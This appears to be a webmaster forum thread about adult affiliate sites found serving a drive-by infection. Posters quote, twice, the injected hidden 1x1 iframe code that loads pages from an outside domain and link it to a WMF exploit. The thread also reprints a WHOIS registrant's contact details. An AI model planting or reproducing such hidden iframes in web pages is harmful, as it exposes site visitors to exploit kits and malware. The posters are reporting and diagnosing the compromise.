NastyDollars sites hacked ???
 

You can find this at the end of some NastyDollars sites code:

Wsfgfdgrtyhgfd.net whois:

Registrant:
Malkon JIU [email protected] +7.4958902809
Malkon JIU
Tverskaya 89-9-1
Moscow,Moscow,RUSSIAN FEDERATION 109098


Domain Name:wsfgfdgrtyhgfd.net
Record last updated at 2006-10-12 06:48:38
Record created on 2006/10/12
Record expired on 2007/10/12


Domain servers in listed order:
ns3.asdbiz.biz ns4.asdbiz.biz


Registration Service Provider:
name: servera.info
tel: +7.9262349216
fax: +7.9262349216
web:http://servera.info

Registry Status: ACTIVE
Registry Status: ok

You have been Zangofied. Clean your system up.

check sig

wtf thats g3y

they load fine for me....

I found that code on some galleries I banned today

you need spyware doctor. everything works for me

I spotted it on bignaturals.. I don't have zango or anything like that.

It tried to get me to open up a xpl.wmf file.

I see it too, I am about 99% sure I don't have any spyware

Servers are clean. Check for spyware is all I can tell you. I have seen spyware that targets our sites and other adult sites, there really isn't much I can do about that.

-N

I found it on bignaturals, cumfiesta, mikesapartment, captainstabbin and inthevip

milfhunter loads fine

System is clean

On the join page of cumfiesta:

<iframe src='http://wsfgfdgrtyhgfd.net/adv/167/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=167' width=1 height=1></iframe>

Sorry guys, but you have most seriously been hacked.

that's the fucking iframe I've been getting on my tgps!!!! their box was compromised :(

http://www.gfy.com/showthread.php?t=...ight=megacount

Yup, Exploit:Win32/Wmfap

These hackers suck big time.

:(

thats what happens when people wanna play with the devil, and not honour the initial agreement

Care to elaborate?

Sperm has it right, thats megacount.

anyone going to cumfiesta join page gets infected....
http://oracleporn.com/ndhack.jpg

Yup, I see this is the source code

<iframe src='http://wsfgfdgrtyhgfd.net/adv/167/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=167' width=1 height=1></iframe>

So are they acknowleging there's a problem now or??

No. We all have the same spyware on all of our computers.

Interesting. I wanna see what happens.

They got me as well today....

I checked a little while ago and it seemed to be gone.

are you with nastydollars?

you might wanna identify yourself in some way if you are

hmmm, too many people getting it for it to be a coincidence

what do you want his name/phone number or something? :1orglaugh

Just checked Cumfiesta, clean for me

Checked my system for spyware on 4 different programs and zilch. I no longer see that code on big naturals...

thats fucked im pulling all nastydollars links


fix your sites boys

i think what jace was saying is if they are from nastydollars and saying the sites are clean they have a problem , if not then he should clarify what he meant

This may be a dumb question but, I don't get exactly what was hacked. I promote nastydollars too so I'm kinda confused. Im new to the webmaster thing obviously. Could somebody explain to me how I can tell?

ok, random nick, 3 posts, no url homepage, no sig

are you an idiot or did you just try and start shit?

basically nobody can join the site without getting infected so anyone you send there is getting infected and that surfer is prob now owned with software that will steal any profit you might make off them. they will know not to go there anymore or your site.. :Oh crap

what I meant was, I am sick of these huge companies having random nicks on GFY with no identification whatsoever attached to them

wanna know what I am associated with? see my profile, my sig, my location, etc

wanna know what "theiconoclast" is associated with? me too!

I think if someone is going to representing a company in a professional manner, they should at least make some effort to show us who are they are with or what company they are repping for....be it sigs, location, etc...

that would be like the owner of TCG coming to the board to answer something like this with no sig, no identification in his profile whatsoever, and saying "everything is fine"......

actually when nastydollars crew does post thats usually them .. a couple posts etc.. i think it is nd but you gotta figure they get asked that questions a million times a day as im sure they are a big target and usually its spyware. but gfy is webmasters :thumbsup

Thanks Smokey... so the general consensous here is what? take all their links off my site? I'm still not sure how to know if its been infected? Like if I click one of the links on my page to like big naturals or something how can I tell?

I guess it is just kind of irritating with all the fake nicks bullshit on this board that they can't even put a "ND Rep" or even "ND" in their sig....or something simple like that

like we are supposed to guess and believe that a person with 3 posts really works for ND...LOL